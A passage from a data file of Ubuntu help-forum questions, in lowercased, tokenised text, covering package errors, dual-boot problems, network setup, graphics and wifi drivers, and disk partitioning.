fail . i have tried a few different versions of get-edid , and i am using ubuntu 12.04 . i have two monitors , one is the acer laptop monitor , and the second is a philips monitor connected via hdmi . i am also using an efi boot method , i wonder if that has anything to do with it ? anyone have any ideas ?
439419	bakomatex installation problem	the problem installed deb package for bakomatex and have been getting errors with dpkg ever since . debanjan @ tanrake : ~ $ sudo apt-get upgrade [ sudo ] password for debanjan : reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up bakoma-tex : i386 ( 10.1.0-130131 ) ... /opt/bakoma/bin/linux/setupcon : error while loading shared libraries : libgtk-x11-2.0.so.0 : can not open shared object file : no such file or directory dpkg : error processing bakoma-tex : i386 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : bakoma-tex : i386 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) steps taken to rectify the problem debanjan @ tanrake : ~ $ sudo dpkg -- configure -a setting up bakoma-tex : i386 ( 10.1.0-130131 ) ... /opt/bakoma/bin/linux/setupcon : error while loading shared libraries : libgtk-x11-2.0.so.0 : can not open shared object file : no such file or directory dpkg : error processing bakoma-tex : i386 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : bakoma-tex : i386
439421	unable to boot into windows after deleting window entry in boot menu .	i installed windows 7 and ubuntu 12.04 . after a reboot , my computer booted into windows 7 . i used easybcd to add an ubuntu boot menu entry , and after rebooting there were 2 choices for me : windows and ubuntu . when i choose ubuntu , the grub menu appears and i see an entry named : `` windows 7 loader ( on.. ) '' . i decided to use easybcd again to delete the windows entry . after another reboot , there was only one entry ( ubuntu ) . i choose it and choose `` windows 7 loader '' to boot into windows . however , windows wo n't boot anymore .
439422	how can i make ubuntu 12.04 desktop guest vm as gateway to vpn network ?	i have an ubuntu 12.04 desktop installed as a virtual os via virtualbox . under network settings of the virtualbox , i have set the network adapter to `` bridged adapter '' . the ubuntu 's ip is set 192.168.1.3 as it gets the ip from my router , and my windows host is set to 192.168.1.2 . i am using the ubuntu 's vpn client ( already installed by default ) to connect to our company 's vpn server and it is successfully connected via ppp0 . so i can now ping , from the ubuntu 's terminal , my computer in the office when connected to the vpn , with the ip 192.168.254.10 . my problem is , how and is it possible for my windows host to connect as well to my office computer ? on my windows network settings , i tried to change the default gateway to 192.168.1.2 ( the ubuntu 's ip ) , but no luck in pinging 192.168.254.x . is there some routing changes to do on the ubuntu and/or on my windows host ?
439428	suddenly 30 gb gone from home in ubuntu how ?	hi noticed a messege showing that less diskspace please clear up space in ubuntu . and when i took properties , i was surprised to see that of my 50gb partition only 4kb is left . then i followed the disk analysis and saw that in home/.cache/upstart 33gb space is shown . how did this happen ? and is it safe to delete .cache ? some body please reply fast .
439429	my machine hangs up on networking restart	i went to lunch for some time and forgot to plug in charger to laptop . after coming back plugged in the charger and started my machine . my internet was not working . so , i checked following things * restarted my laptop . * removed ethernet cable and connected again . * checked ethernet cable with other laptop . * checked by connecting my laptop to other port . * checked by connecting other laptop my port . * network connections and edited the ethernet connection . tried deleting and recreating them . still my internet was not working : on firing following command i got some error , $ sudo /etc/init.d/networking status [ sudo ] password for user : error : calling a sysvinit script on a system using upstart is n't supported . please use the 'service ' command instead . since then i run other comand sudo service networking restart every application running has got terminated and my machine just hanged . i could not do anything at all . since then turned off manually and started . still internet was not working . this has happened lots of times earlier . automatically it starts another day . here is my ifconfig : $ ifconfig eth0 link encap : ethernet hwaddr 14 : fe : b5 : bd:1d:7a inet6 addr : fe80 : :16fe : b5ff : febd:1d7a/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:4480 errors:0 dropped:0 overruns:0 frame:0 tx packets:189 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:395705 ( 395.7 kb ) tx bytes:42279 ( 42.2 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:1438 errors:0 dropped:0 overruns:0 frame:0 tx packets:1438 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:130259 ( 130.2 kb ) tx bytes:130259 ( 130.2 kb ) wlan0 link encap : ethernet hwaddr 38:59 : f9:24:01:3f inet6 addr : fe80 : :3a59 : f9ff : fe24:13f/64 scope : link up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b )
439432	passing arguments to an interactive script which will run in background	i need to run a program in the background . i know that using ' & ' after a command runs the command in the background . in the following script : # ! /bin/bash echo amt of time delay nsec read nano echo amt of time delay in sec read sec echo no.of times read i while [ $ i -ne 0 ] do ./nanosleep $ sec $ nano ./schello i= $ [ i-1 ] done i have a few data that i get from the user . is there a way i can run the program in background and while calling the program can i also specify the data required ( like nano , sec , i ) as arguments or through some other way ?
439435	eve-online and wine 1.7 , alt+tab issue [ help ]	i have issues with running eve on ubuntu . when i execute the following code in a terminal i get issues . wine eve.exe the launcher starts and i login . as soon as i click on play , a new wine window opens with the game . whenever i want to activate the window by clicking on it or alt+tab , it automatically gets minimized . ( the game is running in the background , i can hear the sounds ) so i ca n't play the game . whenever i execute exefile.exe inside the bin folder of eve it is the same . except when i open it in a explorer like the following code : wine explorer /desktop=evea,1366x768 `` c : \program files ( x86 ) \ccp\eve\bin\exefile.exe '' it opens and everything works but only until i switch to another window ( for example skype ) . when i want to go back it minimizes again . what could be the issue ? thanks in advance
439437	how can i put tomcat under apparmor ?	for security reasons , i want to put tomcat under apparmor . the ubuntu server ( 12.04 lts ) guide has a good explanation about apparmor , but i am not sure what is the correct way of creating a profile for tomcat and how to put it under apparmor .
439440	how to trace running a file ?	i want to run a script ( something.tcl ) with a program ( ns2-network simulator ) in ubuntu 12.04 . in order to run that program i have to write the below command : ns something.tcl when i type that command i see something like this for example blah bleh bloo my question is this : is there any command in ubuntu which tells me , for each line of that output which ns2 files write those ? *note : *i am sure those are not output of somthing.tcl
439444	how to install printers from windows 7 home network	can anyone help me ? i have ubuntu and windows . i use our canon printer in windows via home network . the printer is connected on the fritz ! box . if you can , please answer in german ; ) max
439451	why is usermod -a -g sudo username not working ?	during os installation , i created only one account . let 's call it howdy . i thought it would have sudo privileges but i was wrong . i scoured the internet and this forum to find out how to add howdy to the sudoers ' list . i was under the impression that usermod -a -g sudo username would work . i opened a root terminal and issued the command . i closed it . next i opened a normal terminal and issued the following command : sudo gedit /etc/openvpn/update-resolv-conf the following are the error messages : howdy @ wendy : ~ $ sudo gedit /etc/openvpn/update-resolv-conf sudo : unable to resolve host wendy [ sudo ] password for howdy : howdy is not in the sudoers file . this incident will be reported . [ sudo ] password for howdy : furthermore i discovered that my root password has changed to the password for howdy . this is odd . so when i opened a root terminal i now had to enter the password for howdy ( the original root password did not work ) and issued the command visudo and scrolled down to the phrase # allow members of group sudo to execute any command my account called howdy is not on it . i need help with the following : ( 1 ) undo the changes brought about by usermod -a -g sudo username , especially to revert the root password to the original password i entered during os installation . i do n't know what the parameters -a and -g do . ( 2 ) show me how to add my account called howdy to the sudoers ' list . thanks in advance .
439452	xubuntu 12.04 usb wifi adaptor	my friend has an old laptop that had xp on so i 've installed xubuntu 12.04 but when i tried to install the additional drivers for my usb wifi adaptor - a avm fritz with broadcom 7xxx chipset ( i dont remember the exact chipset ) it crashed the laptop . so what usb wifi adaptor do i need to buy that will definitely work with xubuntu 12.04 ? im using xubuntu 12.04 because its an old laptop and it has a none pea cpu ( or some similar acronym ) so it wont run ubuntu 12 or the later versions of the other distros . the usb adaptor i currently have is n't a new one , it is several years old . is there a database anywhere listing what hardware works with linux ? thanks
439454	can not install app from non home directory	i moved netbeans-7.4-linux.sh in the following directory /media/hosam/i/linux , before installing ubuntu . what i type : hosam @ hosam : ~ $ cd '/media/hosam/i/linux/' hosam @ hosam : /media/hosam/i/linux $ sudo chmod +x netbeans-7.4-linux.sh [ sudo ] password for hosam : hosam @ hosam : /media/hosam/i/linux $ sudo ./netbeans-7.4-linux.sh what i get sudo : ./netbeans-7.4-linux.sh : command not found when i moved it to /home it worked well
439455	what is the role of the .iceauthority file ?	when i listed files in my home directory , there was a hidden file named .iceauthority . what is this file , and what is its role ?
439459	change mac address via terminal	is there any way to change mac address via terminal ? and of course any command for this job ?
439463	itunes alternative that will sync with an android	apparently there 's a bit of a workaround with rhythmbox to get it to sync with an android . is there a really good piece of software that syncs easily with any type of phone ? or at least allows you easily send files to your device with no hassle ? or can rhythmbox sync quite easily with an android and that was an old article ? in this case , how can i setup rhythmbox to sync with android ?
439465	what does `` pts/6 '' or `` ? '' mean in the output of ps	i am running bitcoin , litecoin , dogecoin , auroracoin and anon coin servers in different ports . when i grep each coin has different configurations as shown below . i ca n't understand what the question mark is and what is pts . followed something here . have i configured correctly ? ? $ ps -ef | grep bitcoin 1001 18662 18279 2 17:34 pts/6 00:00:02 bitcoind 1001 18751 18279 0 17:35 pts/6 00:00:00 grep bit $ ps -ef | grep lite 1001 18712 18279 2 17:35 pts/6 00:00:01 ./litecoin-d/src/litecoind 1001 18754 18279 0 17:36 pts/6 00:00:00 grep lite $ ps -ef | grep doge 1001 18719 1 6 17:35 ? 00:00:03 ./dogecoin-d/src/dogecoind 1001 18756 18279 0 17:36 pts/6 00:00:00 grep doge $ ps -ef | grep auro 1001 18522 1 0 17:24 ? 00:00:06 ./auroracoin-d/src/auroracoind 1001 18758 18279 0 17:36 pts/6 00:00:00 grep auro $ ps -ef | grep anon 1001 18743 18279 3 17:35 pts/6 00:00:01 ./anoncoin-d/src/anoncoind 1001 18762 18279 0 17:36 pts/6 00:00:00 grep anon
439466	geforce 610m with ubuntu 13.10	how can i check to have installed correctly the proprietary nvidia driver ? why glxgears with and w/o optirun the output it 's pretty much the same : 59 fps . lsmod | grep nvidia gives 0 lines . but according to dpkg -l i have the following packages : ii bumblebee-nvidia 3.2.1-5~xedgers~saucy1 amd64 nvidia optimus support using the proprietary nvidia driver ii nvidia-331 331.49-0ubuntu1~xedgers13.10.3 amd64 nvidia binary driver - version 331.49 ii nvidia-common 1:0.2.83 amd64 transitional package for ubuntu-drivers-common rc nvidia-libopencl1-304 304.119-0ubuntu1~xedgers13.10.1 amd64 nvidia opencl driver and icd loader library ii nvidia-libopencl1-331 331.49-0ubuntu1~xedgers13.10.3 amd64 nvidia opencl driver and icd loader library rc nvidia-opencl-icd-304 304.119-0ubuntu1~xedgers13.10.1 amd64 nvidia opencl icd ii nvidia-opencl-icd-331 331.49-0ubuntu1~xedgers13.10.3 amd64 nvidia opencl icd ii nvidia-settings 331.38-0ubuntu1~xedgers~saucy1 amd64 tool for configuring the nvidia graphics driver also : optirun glxheads gives : gl_vendor : nvidia corporation gl_renderer : geforce 610m/pcie/sse2 while glxheads alone : gl_vendor : intel open source technology center gl_renderer : mesa dri intel ( r ) ivybridge mobile
439469	i updated to 12.10 and now it wo n't boot .	i updated to 12.10 recently , ( yesterday ) and when i rebooted , i selected my ubuntu partition , and it seemed to boot normally , but after it got past the ubuntu loading screen , it just goes to a single text cursor . i really need some help , i use this computer regularly . ( dell latitude e5430 ) thanks in advanced !
439470	how to remove all packages which is installed by dpkg from debs	i used to install packages by dpkg -i *.deb as i have all deb ( with dependencies ) in one folder . now is there any reverse process of dpkg -i *.deb to remove all packages installed from debs . ( dpkg -r < pkgname > is not helpful because it requires package-name instead of deb file and not accept *.deb )
439471	ca n't zoom out in ubuntu desktop	running a dualboot ubuntu with windows 7 i boot up ubuntu for the first time and start to mess around with the desktop to personalize it . i opened up a window and it was showing me key shortcuts for zooming in and out . zoom in was set to 'meta=+- ' ( or something like that ) whatever that means . so i remapped the zoom to a more simple key of just + . i held it down for a split second and now it 's zoomed in so far to the screen that i can only see pixels . ca n't do jack on my desktop . back to windows 7 and i 've been googling for the past 2 hours for something to help me but nothing works . i 've tried just about every key/mousewheel combo that was reccomended by the search results but to no avail . someone please help me fix this before i put my foot through the screen . i think i 'm running ubuntu 10 if that helps .
439475	dpkg remains configuring moodle	when i tried to configure moodle like : root @ server : ~ # dpkg -- configure moodle it remains like that indefinitely . whatching this process on `` top '' i realized that it does not use any memory capacity and the cpu capacity use by this process ranges from 4 to 10 . i am using kubuntu server 10.04 lucid with linux kernel 2.6.32-24-server
439476	uninstall dovecot from ubuntu server 12.04	i do n't need pop/imap related service for my server so i have disabled dovecot but i want to completely remove all package related to dovecot . there are many packages with similar name and i am not sure how to completely remove it .
439480	black screen instead of login screen ( serious problem ) ?	i 'm having a serious problem . i use dual os so i 'm posting with windows . i am having a problem . somewhat about 2-3 hours before everything was working fine i have modified ubuntu a lot and was using mac os x login screen . it was working fine . but i was just having fun and typed this command in terminal to power off ( using ubuntu 13.10 ) { and using root } . sudo shutdown -h now also i changed password for su using sudo passwd root i kept my laptop aside and came after 2-3 hours . it booted with a splash screen of mac . then it took to a blank screen ( ok this happens every time , but after 5-10 seconds login appears ) , but these times i 'm getting a black screen with a mouse . i can move mouse but ca n't login . only black screen is there , but everything else is working when i press powerbutton it shuts down like usual . screen somewhat looks like this : i 'm stuck , please help me ! < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < answer > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > i got an answer if this happens to anyone else . just follow the steps : open terminal using ctrl+alt+f1 login to your account . type 'startx' ( if this does not work , try 'sudo startx ' ) your desktop will appear after some time . do what you want to do . in my case i had changed my login greeter , so i edited my lightdm.conf and used the default greeter .
439481	how can i install ubuntu via usb ?	i am trying to install ubuntu 13.10 in my notebook from an usb flash drive but when i try to boot or install directly from the usb i got the following messages and the process stops . no caching mode page present assuming drive cache : write through attached scsi disk what is the problem and what can i do in this case ?
439482	12.04 server multiple ip addresses with multiple interfaces	i 'm running ubuntu 12.04 server on virtualbox . i 'm trying to setup two interfaces with static ip addresses . if i only attach one network interface then eth0 works fine , but once i attach my second interface , eth0 does n't work but eth1 does . i 'm doing this because eth0 is my management subnet and eth1 is my admin/employee subnet . below is how i 've configured the /etc/network/interfaces file . any help would be greatly appreciate . thanks . # this file describes the network interfaces available on your system # and how to active them . for more information , see interfaces ( 5 ) . # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto eth0 iface eth0 inet static address 10.192.168.60 netmask 255.255.254.0 gateway 10.192.168.1 network 10.192.168.0 broadcast 10.192.169.255 dns-nameserver 192.168.1.21 # the secondary network interface auto eth1 iface eth1 inet static address 192.168.0.11 netmask 255.255.248.0 gateway 192.168.0.1 network 192.168.0.0 broadcast 192.168.7.255 dns-nameserver 192.168.1.21
439486	trouble with sharing	i am trying to create a file server / backup machine out of an old pc and am not having any luck sharing the intended drive with the network . please have a little patience with my ignorance , i happily to confess to being a complete newbie ( only experience is a couple of weeks trying to get this to work ) i have in a pc with internal drives 1* small ssd for os 1* 1tb hdd for serving files - to be shared 1* 2tb hdd for backup of the 1tb hdd i have already tried everything i can find on this forum and others , but still ca n't mount both hdds where i want them , and still have only ever successfully shared /home/ ( but never when i have mounted the required drive there . ) so here 's the question . is there a user guide somewhere which can explain this for a novice ? bearing in mind that i am performing a clean install . ( tried both 12.04 and 13.10 ) i have tried mounting on install , using pysdm and directly in fstab with uuid . i have tried sharing directly from folder , using cli and from gui samba . ~ dazedandconfused
439489	how to recover my ubuntu .	in ubuntu 13.10 i used the following command in my terminal , to gain root access : sudo sh -c 'echo `` greeter-show-manual-login=true '' > > /etc/lightdm/lightdm.conf' than i restarted the system , but it seems my system has crashed . it 's not even starting again . is there any solution to fix my problem ?
439492	monitor data usage by program or domain ?	iâve seen options for monitoring the total data usage . however , i want to know how much bandwidth within a day or month a particular application is using . android style . potentially , also by domain name instead of by application also . are there any options that satisfy these requirements ?
439493	could my partition setup on my hitachi travelstar be causing smart spinup problems ?	i just purchased a refurb samsung laptop for my girlfriend with a 500gb hitachi travelstar . i partitioned it and installed win 7 ( for required work related programs for her ) / and 12.04 lts ( for general use , because she has basically become a linux convert using my laptop ... : ) ) we 've been using it for a couple weeks with no issues , but today disk utility reported a smart error for spinup time ... other details : -originally put 12.04 lts on first , then win 7 ... that order of operations seemed to mess with grub , so i downloaded and ran boot-repair . this seemed to correct boot issues . -when i decided to try to reboot to win this morning after the error , i found that win was suspended , and not shut down , so i shut it down completely and rebooted to 12.04 ... when i did this , the smart spinup value changed : with win hibernating : norm . : 31 ; thresh . : 33 , value : 11 ( msec ) with win shut down : norm . : 31 ; thresh . : 33 , value : 1 ( msec ) -i chose to encrypt her home folder ( which i have never done before , do n't ask me why i did this time , i do n't know ... ) , and then found out that hitachi travelstars have built-in encryption ? is this correct ? is this an issue ? i get an error at ubuntu screen saying something about a '/dev/ ( ? ) /cryptswap/ ' not mounting/mounted , s for skip , m for manual rec ... but neither keystroke yields a response . i will state now that i am not a novice , but definitely not an expert ... : ) that being said , i guess i 'm looking for some thoughts/help about the general situation such as : -is there a possibility that choosing encryption did something ? -is it possible for smart to be reporting this error falsely ? -how `` imminent '' is this failure , if smart is reporting correctly ? -would a backup/format/re-install possibly correct things ? sorry for jamming so many ? 's in ... i know it 's frowned upon , but if this thing is going to blow up , i need to get it all out there asap . thank you in advance for any help ... -asm
439495	install windows 8 ( on secondary hard disk ) on an ubuntu machine ( on primary hard disk )	i have ubuntu 13.10 installed on my primary hard disk and i was not able to install windows in that drive . so i bought a new secondary drive . how can i install windows 8 on my secondary drive without affecting ubuntu , and will i be needing to update grub ? what partition table to use on the secondary drive ? thank you in advance
439496	recursive checksumming	i 've been using the following command line to do recursive checksumming of directories . it seems to get the job done , but still being a newbie i 've been wondering , are there any potential problems with doing it this way ? is it possible for this command to miss files or otherwise mess up ? find ./dir/ -type f -exec sha1sum { } \ ; > files.sha1
439501	help with finding a windows rt port	so far i 've been getting a good bit of non-answers by other linux forums for a port ( that works ) of ubuntu for a surface rt . i just want a dl link or a detailed walk through on how to make one myself , seeing as i am not a dev . i understand how to install ubuntu , and that 's about the extent of my knowledge on the subject .
439502	bluefish editor error : failed to create a command	bluefish editor shows this error : failed to create a command for firefox -remote 'openurl ( % p ) ' || firefox ' % p ' & . whenever i want to test my html code , i click to the browser button in bluefish editor.but it does n't show any output on the firefox . my question is , how to create command for firefox in order to test html code ?
439503	ssh : how to modify received characters ?	i would like to configure my ubuntu server ( without x windows ) to modify escape characters received from the ssh clients . because by some reasons i ca n't modify original keystrokes on the remote client . i have root access to the server machine . console access as well as ssh . openssh is installed there . but it is ok to replace it with something different if needed . to be more specific . i would like , for example , to exchange ctrl and f10 , so f10+c is recognized as a ctrl+c . thanks in advance ! p.s . please , do n't suggest any solutions based on modification of client machine . let 's assume i do n't have access to the client machine .
439508	recovery of files after installation	i had windows 7 on my computer and wanted to install ubuntu . i did not do manual partitioning . when i restarted the system , i found out that my drive was reformatted . is there a way i can recover my files ?
439509	install ubuntu 12.04 lts on raid 1 centos	my current computer runs on centos with raid 1 . it has 3 hdd : one for system files , 2 others for data in raid 1 . i want to change centos for ubuntu , but i want to know if , by removing centos and installing ubuntu , the raid 1 system would be kept or if i will need to rebuild it . thanks for your answers and good day to erverybody ! nolan
439510	remove webapps launcher iconsalso	i like how the web apps integrate with unity , but i would prefer if they did n't show their icon in the launcher . is their a way to disable the launcher icon but keep their panel indicator ? also i could n't find the manual reference page for the webapps , in order to get more from it .
439512	computer reboots instead of shutdown , only after suspend	i have posted seen this on the ubuntu forums ( http : //ubuntuforums.org/showthread.php ? t=2175057 ) , but its not drawing a solution there so i am posting here . problem is when i shutdown my computer it restarts . this only happens if i have put the computer into suspend at some point since the last boot . this means that once the computer reboots once , i can shut it down fine , as long as i do n't put it into suspend again . shutting down from the command line , or gui makes no difference . whether i activate suspend via lid close or from the gui makes no difference . problem is on a thinkpadx31e ( intel ) and has persisted across 12.04 , 12.10 , 13.04 , 13.10 . any ideas on what i do to fix this annoying bug ? @ terdon : some people have mentioned problems with networking/wifi cards . on this point , perhaps it is useful to also point out that i was having problems with my broadcom bcm43228 chip , as the proprietary driver was causing the system to freeze when on battery power . i changed to an intel centrino wireless chip and that solved the problem of freezing . the reboot problem on shutdown , after suspend , persisted across the different chips . @ terdon : i see two potential problems in var/log/pm-suspend.log . one pertains to failed connections and gives the following : running hook /usr/lib/pm-utils/sleep.d/60_wpa_supplicant suspend suspend : failed to connect to wpa_supplicant - wpa_ctrl_open : no such file or directory /usr/lib/pm-utils/sleep.d/60_wpa_supplicant suspend suspend : success . the other pertains to a suspend not being applicable : running hook /usr/lib/pm-utils/sleep.d/95hdparm-apm suspend suspend : /usr/lib/pm-utils/sleep.d/95hdparm-apm suspend suspend : not applicable . this second error has a different file causing the problem in different instances : eg . /usr/ ... /sleep.d/75modules /usr/ ... /sleep.d/90clock /usr/ ... /sleep.d/95anacron /usr/ ... /sleep.d/95hdparm-apm do you need to know all of the different ones ?
439514	can anyone confirm a combination of ubuntu version plus nvidia driver version plus bumblebee that works ?	is there a known combination of ubuntu 13.10 + nvidia driver + bumblebee that works with an optimus nvidia laptop ? i have a dell latitude e6530 laptop with an intel i7 cpu + integrated gpu + nvidia nvs 5200m optimus card . i 've tried a few combinations from various suggested repos but nothing works for me so far . lspci -v outputs : 01:00.0 vga compatible controller : nvidia corporation gf108glm [ nvs 5200m ] ( rev a1 ) ( prog-if 00 [ vga controller ] ) subsystem : dell device 1535 flags : bus master , fast devsel , latency 0 , irq 16 memory at f5000000 ( 32-bit , non-prefetchable ) [ size=16m ] memory at e0000000 ( 64-bit , prefetchable ) [ size=256m ] memory at f0000000 ( 64-bit , prefetchable ) [ size=32m ] i/o ports at e000 [ size=128 ] expansion rom at f6000000 [ disabled ] [ size=512k ] capabilities : < access denied > kernel driver in use : nouveau
439518	ca n't get access to networkdrive mounted from fstab	hope someone can help me a little . setup : ubuntu 13.10 server . ubuntu 13.10 worksstation the server have some samba shares . some er private , and others are shared between groups . the problem is the user : user : mz ( 1002 ) group : mz ( 1002 ) drwxrws -- - 4 chp samba_usr_grp 4096 dec 5 09:01 billeder drwx -- -- -- 7 chp chp 4096 mar 24 12:16 chp drwx -- -- -- 2 chpsec chpsec 4096 okt 30 21:29 chpsec drwx -- -- -- 3 mz mz 4096 mar 25 21:23 mz drwx -- -- -- 2 mzp mzp 4096 okt 30 21:29 mzp drwx -- -- -- 2 nzc nzc 4096 okt 30 21:29 nzc drwx -- -- -- 2 public public 4096 okt 31 00:26 public drwx -- -- -- 2 sapphire sapphire 4096 okt 30 21:29 sapphire drwxrwxrwx 2 root root 4096 mar 26 14:53 sys_public drwxrws -- - 4 chp samba_usr_grp 4096 mar 21 18:00 sys_smb_grp_share drwx -- -- -- 2 testuser testuser 4096 okt 30 21:29 testuser i try to mount the users drive true fstab with the command : //server/share /mnt/mountname cifs username=server_user , password=user_password , iocharset=utf8 , file_mode=0777 , dir_mode=07ââ77 0 0 i try to mount 'billeder ' , 'mz ' , 'public ' and 'sys_smb_grp_share' they all mount correct , and is working , except 'mz ' . they all show up in 'files ' . but when i click on 'mz ' , an alert says ( freely translated ) : this place ca n't be shown . you do not have the required permissions to view the contents of 'mz' if i go to `` connect to server '' , i can see and access the content , according to access rights . any suggestions on what might be wrong ?
439519	installing ubuntu after centos -- how to handle partitions	apologies first of all . i 'm a newbie , and i 'm sure it will be obvious there are many things i do n't understand . i 'd like to install both ubuntu and centos on a new machine . ubuntu is what i am used to and comfortable with ( and what is currently connecting to the network in an unproblematic way ) , but for some software/work reasons i 'd like the option of booting into centos . basic setup of the machine : two 2-terabyte hard drives , /dev/sda1 , /dev/sda2 i installed centos first . now i am trying to install ubuntu . ubuntu is n't seeing my centos installation . in order to not just write over centos , i went into the partition editor . but i do n't know how to edit my partitions . i see that there 's a /dev/sda1 on with 524 mb allocated to it , ext4 filesystem , 52 mb used . i presume that 's where centos is installed . then i have 1999873 mb unallocated free space . how do i set up /dev/sda so that ubuntu installs nicely alongside centos ? i assume i have to set up partitions in the unallocated free space . do i set up another 524 mb partion , say its ext4 , and say that the mount point ( confused on this concept ) is /boot ? then do i set up another partition with the rest of the space , with mount point / ? do i set up my swap space at the end of /dev/sda as a last partition ? thanks , and apologies for my ignorance . i have been trying to read about this online but it is hard to find discussions of the issues pitched to my level and it would be helpful to have a dialogue . update thanks for all the responses . my question has now evolved . before i knew that anyone had replied , i decided to install ubuntu as the first os , allowed it to wipe centos , then reinstalled centos , pointing it the same disk /dev/sda ( thanks for the correction ) as the ubuntu installation . i installed grub and now i can boot into both oss . so i 'd be a happy clam if it were n't for adaephon 's comment below . according to what i can glean from looking at the display in gparted , when i installed ubuntu from my live cd , it took a 487 mb partition for /boot/efi and says it 's using 3.04 mib of space . i let centos make its own decisions , and it took 500 mb for its boot partion , after a 6.95 gb root partition . i do n't know if that was enough space or whether i am going to have problems down the road . definitely better to fix them now if so ! here is the output of fdisk -l /dev/sda /dev/sdb ( from ubuntu ) : disk /dev/sda : 2000.4 gb , 2000398934016 bytes 255 heads , 63 sectors/track , 243201 cylinders , total 3907029168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sda1 1 3907029167 1953514583+ ee gpt partition 1 does not start on physical sector boundary . disk /dev/sdb : 2000.4 gb , 2000398934016 bytes 81 heads , 63 sectors/track , 765633 cylinders , total 3907029168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x000315ee device boot start end blocks id system /dev/sdb1 2048 3907029167 1953513560 8e linux lvm here is the output of df -l -xtmpfs -xdevtmpfs filesystem 1k-blocks used available use % mounted on /dev/sda2 7037432 3323776 3333088 50 % / /dev/sda1 497696 2116 495580 1 % /boot/efi it seems it is an efi machine .
439523	change the language in my libreoffice	i use ubuntu 13.10 and i have installed libreoffice by ppa . but it is in english . i want to change for portuguese . how can i do this ?
439524	problem wiping ssd using hdparm command	i want to wipe my ssd using hdparm , but when i use the hdparm -i command to verify whether it 's frozen or not , under commands instead of security : ( info here ) i get : integrity word not set ( found 0x0000 , expected 0x40a5 ) thanks for any replies ! ( by the way , i have an acer aspire one with a samsung p-ssd1800 8gb ssd ) post on how to wipe ssd using hdparm : https : //ata.wiki.kernel.org/index.php/ata_secure_erase
439534	how to enable hibernate option in ubuntu 13.10 ?	i ca n't enable hibernate option in ubuntu 13.10 even after doing the following : sudo gedit /var/lib/polkit-1/localauthority/50-local.d/hibernate.pkla writing : [ re-enable hibernate ] identity=unix-user : * action=org.freedesktop.upower.hibernate resultactive=yes
439536	problems in installing e ( fx ) clipse kepler	i 'm using ubuntu 13.10 . im using eclipse kepler enterprise edition ( version : kepler service release 2 build id : 20140224-0627 ) . i want to install javafx ( e ( fx ) clipse ) in my kepler version . i 've tried to install it from eclipse market place it gave me the error like e ( fx ) clipse will not be installed . i 've searched about this error i found http : //www.eclipse.org/forums/index.php/t/629144/ but it dint helped me . so i 've choosen another option to install e ( fx ) clipse , and i found the steps at http : //www.eclipse.org/efxclipse/install.html # for-the-ambitious when i 'm trying to install using those mentioned steps i found the erros like can not complete the install because one or more required items could not be found . software being installed : e ( fx ) clipse - ide - kepler 0.9.0.201401250805 ( org.eclipse.fx.ide.all.kepler.feature.feature.group 0.9.0.201401250805 ) missing requirement : e ( fx ) clipse - ide - fxgraph 0.9.0.201401250805 ( org.eclipse.fx.ide.fxgraph.feature.feature.group 0.9.0.201401250805 ) requires 'org.eclipse.xtext.sdk.feature.group 2.5.0 ' but it could not be found can not satisfy dependency : from : e ( fx ) clipse - ide - kepler 0.9.0.201401250805 ( org.eclipse.fx.ide.all.kepler.feature.feature.group 0.9.0.201401250805 ) to : org.eclipse.fx.ide.fxgraph.feature.feature.group [ 0.9.0.201401250805 ] after that i 've deleted my eclipse current version and i 've downloaded the same version ( eclipse kepler enterprise edition ) once again and tried to install e ( fx ) clipse once again even then i 've got the same problems . can some one help me with this issue ?
439537	how to install wifi drivers for ubuntu 13.10 on an asus z87-deluxe motherboard	for three weeks , i have been trying to make the wifi on my asus z87-deluxe motherboard work . all i know is that i need this file : hybrid-v35_64-nodebug-pcoem-6_30_223_95.tar.gz which i 've already downloaded and i 'm trying to install it , following these instructions : tar xvzf hybrid-v35_64-nodebug-pcoem-6_30_223_95.tar.gz -c b43b1-6.30.223.95 cd b43b1-6.30.223.95 touch dkms.conf gedit dkms.conf paste this ( without lines ) : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- package_name= '' b43b1 '' package_version= '' 6.30.223.95 '' clean= '' make clean '' make= '' make '' built_module_name= '' wl '' built_module_location= '' ./ '' dest_module_location= '' /updates '' -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- save and exit cd .. sudo mv b43b1-6.30.223.95 /usr/src/b43b1-6.30.223.95 cd /usr/src/b43b1-6.30.223.95 sudo dkms add -m b43b1 -v 6.30.223.95 sudo dkms build -m b43b1 -v 6.30.223.95 sudo rmmod wl sudo dkms install -m b43b1 -v 6.30.223.95 sudo modprobe wl i seem to be stuck at sudo dkms build -m b43b1 -v 6.30.223.95 where i get errors from missing package hooks ( such as dkms_packages.py ) does anyone know how i can install the file , or does anyone have an idea how i can get my wifi to work ? this is my wifi card : 14e4:43b1 broadcom corporation device 43b1 ( rev 03 ) thanks in advance
